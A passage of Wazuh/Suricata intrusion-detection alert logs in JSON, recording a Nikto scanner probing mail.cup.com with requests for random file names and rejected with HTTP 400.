(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.445037+0000","flow_id":"429677102155680.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47008","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.449313+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":37,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.61453","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.449313+0000\",\"flow_id\":324562072555718,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47010,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.htaccess\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.449313+0000","flow_id":"324562072555718.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47010","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.htaccess","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.452773+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":38,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.62999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.452773+0000\",\"flow_id\":1849172383425421,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47012,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.notes\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.452773+0000","flow_id":"1849172383425421.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47012","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.notes","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.455975+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":39,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.64541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.455975+0000\",\"flow_id\":2160789440622614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47014,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.455975+0000","flow_id":"2160789440622614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47014","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.459533+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":40,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.66073","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.459533+0000\",\"flow_id\":124820323499370,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47016,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.snp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.459533+0000","flow_id":"124820323499370.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47016","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.snp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.462827+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":41,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.67609","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.462827+0000\",\"flow_id\":67126027750670,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47018,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cfm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.462827+0000","flow_id":"67126027750670.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47018","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cfm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.465956+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":42,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.69143","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.465956+0000\",\"flow_id\":1588798580987989,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47020,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.zip\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.465956+0000","flow_id":"1588798580987989.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47020","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.zip","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.468908+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":43,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.70681","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.468908+0000\",\"flow_id\":1790687813706853,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47022,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.txt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.468908+0000","flow_id":"1790687813706853.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47022","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.txt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.471834+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":44,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.72219","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.471834+0000\",\"flow_id\":1467865186840382,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47024,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js0x70\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.471834+0000","flow_id":"1467865186840382.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47024","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js0x70","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.479014+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":45,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.73763","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.479014+0000\",\"flow_id\":1815388170634565,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47026,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bas\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.479014+0000","flow_id":"1815388170634565.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47026","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bas","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.482231+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":46,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.75301","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.482231+0000\",\"flow_id\":2.02973710348082e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47028,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.LCDispatcher\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.482231+0000","flow_id":"2029737103480820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47028","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.LCDispatcher","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.484832+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":47,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.76861","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.484832+0000\",\"flow_id\":1487763770335653,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47030,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.484832+0000","flow_id":"1487763770335653.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47030","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.490695+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":48,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.78399","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.490695+0000\",\"flow_id\":2040551831140588,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47032,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gz\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.490695+0000","flow_id":"2040551831140588.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47032","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gz","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.497254+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":49,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.79935","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.497254+0000\",\"flow_id\":119434434482673,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47034,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.xtp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.497254+0000","flow_id":"119434434482673.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47034","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.xtp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.500145+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":50,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.81471","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.500145+0000\",\"flow_id\":833747625352614,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47036,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-kr\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.500145+0000","flow_id":"833747625352614.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47036","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.iso2022-kr","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.502204+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":51,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.83021","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.502204+0000\",\"flow_id\":1034666195461575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47038,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bat\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.502204+0000","flow_id":"1034666195461575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47038","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bat","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.504875+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 